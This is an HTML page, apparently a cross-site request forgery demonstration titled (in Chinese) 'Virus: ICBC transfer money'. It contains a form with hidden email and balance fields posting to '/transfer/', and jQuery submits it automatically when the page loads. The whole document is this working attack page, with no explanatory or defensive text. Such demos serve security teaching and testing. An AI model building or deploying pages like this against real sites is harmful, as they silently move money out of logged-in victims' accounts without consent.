<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>病毒：工商银行转钱</title>
    <script src="https://cdn.bootcss.com/jquery/3.4.1/jquery.min.js"></script>
</head>
<body>
    <form action="/transfer/" method="post" id="myform">
    <table>
        <tbody>
            <tr>
                <td></td>
                <td><input type="hidden" name="email" value="llj@qq.com"></td>
            </tr>

            <tr>
                <td></td>
                <td><input type="hidden" name="balance" value="600"></td>
            </tr>
            <tr>
                <td></td>
                <td><input type="hidden" value="提交"></td>
            </tr>
        </tbody>
    </table>
</form>
    <script>
          $(function () {
        $("#myform").submit();
    });
    </script>
</body>
</html>